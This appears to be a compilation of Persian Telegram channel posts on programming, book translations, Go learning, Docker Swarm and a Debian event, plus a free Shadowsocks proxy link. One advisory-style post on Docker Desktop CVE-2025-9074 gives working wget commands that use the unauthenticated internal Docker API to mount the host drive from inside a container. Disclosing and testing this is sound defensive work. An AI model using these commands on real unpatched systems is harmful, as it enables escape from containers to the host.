ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01

شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray

🌐 freesocks.org/docs/setup/

دریافت از لینک زیر

📘 Task Programming in C# and .NET

یه خبر خوب! 🎉
شروع کردم به ترجمه‌ی این کتاب. که به صورت تخصصی وارد دنیای برنامه‌نویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️

🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian

چند وقت پیش دوستی با اجرا کردن یه ابزار مرسوم، فایل‌های سرگردانی رو روی سرور من پیدا کرد. توی این ویدئو مفهوم رو توضیح می دم و ابزار رو نشون می دم.
https://youtu.be/pBY6Chqqy_c

https://github.com/hemansadeghi/Termify.git

ابذار کاربردی اضافه کنید رفقا 😁❤️

#linux
#cli
#byteforge
@byteforge_chan 🛸

برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه می‌ندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید دیدید برید اونو سرچ کنید یاد بگیرید

github.com/inancgumus/learngo

@Linuxor

رفقای دواپسی گلم 🙋‍♂
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده

📕 Clean Code in C#

یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls به‌صورت رسمی آماده شد! این کتاب یکی از منابع فوق‌العاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرم‌افزار در #C به‌حساب میاد.


همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه می‌ده. ممنون از حمایتتون! ❤️

https://github.com/hheydarian/clean-code-in-csharp-persian

مثله همیشه حامد عزیز ی حرکت خفن زده ی سر به ریپو بزنید ❤️👌

اگر از Docker Desktop استفاده می‌کنید حتما باید آپدیتش کنید؛ یک vulnerability سطح بالا توی نحوه پیاده‌سازی داره (آپدیت آخر مشکل رو حل کرده)

https://nvd.nist.gov/vuln/detail/CVE-2025-9074

این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.

توی گزارش اصلی فقط ویندوز گفته شده (نمی‌دونم مک هم داره یا نه)

🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.

docker run -it alpine /bin/sh

سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.

wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start

این پیلود با ارسال یک درخواست HTTP به آدرس زیر،

192.168.65.7:2375/containers/create

یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

✅ راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes

Looking for a book:
Automating DevOps with GitLab CI/CD Pipelines: Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples

Automating DevOps with GitLab CI/CD Pipelines
Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Christopher Cowell, Nicholas Lotz & Chris Timberlake
Packt, 2023

#book
#devOps
#byteforge
@byteforge_chan 🛸

حقیقتا من این کانفیگ رو پارسال تابستون گرفتم 33 تومن الان باشه احتمالا یه 60تایی پیاده بشم

Core i5 12500H-16 core
32+8>>40 g ddr4 4800mhz
1T ssd nvme gen2
Gpu intel iris xe 8g share



مطلبت خیلی خوب و خلاصه‌ست 👌

ولییییی
یه نکته‌ای که جا افتاده اینه که Swarm دیگه عملاً توسط Docker به‌طور جدی توسعه داده نمیشه،
و بیشتر در حالت maintenance mode قرار گرفته. همین باعث شده جامعه‌ی کاربری و اکوسیستمش خیلی محدود بشه. در مقایسه با Kubernetes، مواردی مثل auto-healing، HPA (Horizontal Pod Autoscaler)، شبکه‌سازی پیشرفته (CNI)، و اکوسیستم ابزارهایی مثل Helm و Operatorها توی Swarm وجود ندارن.

مثال‌هایی که آوردی هم بیشتر دم‌دستی بودن. مثلاً برای یه نقد واقعی بهتر بود یه use-case عملی‌تر مثل دیپلوی یه اپ میکروسرویسی (frontend + backend + db) رو نشون بدی تا مقیاس‌پذیری و محدودیت‌های Swarm بهتر دیده بشه.

همچنین بخش امنیت رو خوب پوشش دادی، اما از نظر observability (مانیتورینگ، لاگ‌گیری، tracing) چیزی گفته نشده، در حالی که توی پروژه‌های واقعی خیلی مهمه. ابزارهایی مثل Prometheus، ELK یا حتی Docker Swarm Visualizer معمولاً باید بهش اضافه بشن.

خلاصه بگم: محتوا برای معرفی اولیه خیلی خوبه، ولی برای کسی که بخواد تصمیم فنی بگیره، لازمه ضعف‌ها و محدودیت‌های Swarm هم شفاف‌تر گفته بشه تا یکطرفه نباشه.

#docker
#byteforge
@byteforge_chan 🛸

https://github.com/hemansadeghi/glory-vscode-theme.git
چن ماه پیش همینجوری ساختمش
دوس داشتید یه تست بزنید

گروه کاربران ایرانی دبیان قصد دارد به مناسبت انتشار نگارش ۱۳ سیستم‌عامل دبیان رویداد یک‌روزه‌ای شامل کنفرانس علمی، کارگاه‌های آموزشی و نمایشگاه برگزار کند.

هدف از این رویداد که بهانه‌ای است برای گردهمایی و هم‌رسانی دانش و تجربه میان اعضای جامعه نرم‌افزار آزاد ایران، تقدیر از زحمات توسعه‌دهندگان دبیان و سایر نرم‌افزارهای آزاد، معرّفی و تبیین ویژگی‌ها و دستاوردهای نگارش جدید و ترویج فرهنگ آزادی نرم‌افزار است.

این رویداد فرصتی را برای تبادل دانش و تجربه میان شرکت‌کنندگان و جذب مشارکت‌کنندگان جدید و تقویت جامعهٔ محلی نرم‌افزارهای آزاد فراهم می‌کند.

از این رو از تمامی علاقه‌مندان به ارائه یا برگزاری کارگاه درخواست می‌شود عنوان ارائه‌های خود را به همراه توضیح به نشانی رایانامهٔ events روی debian.ir بفرستند.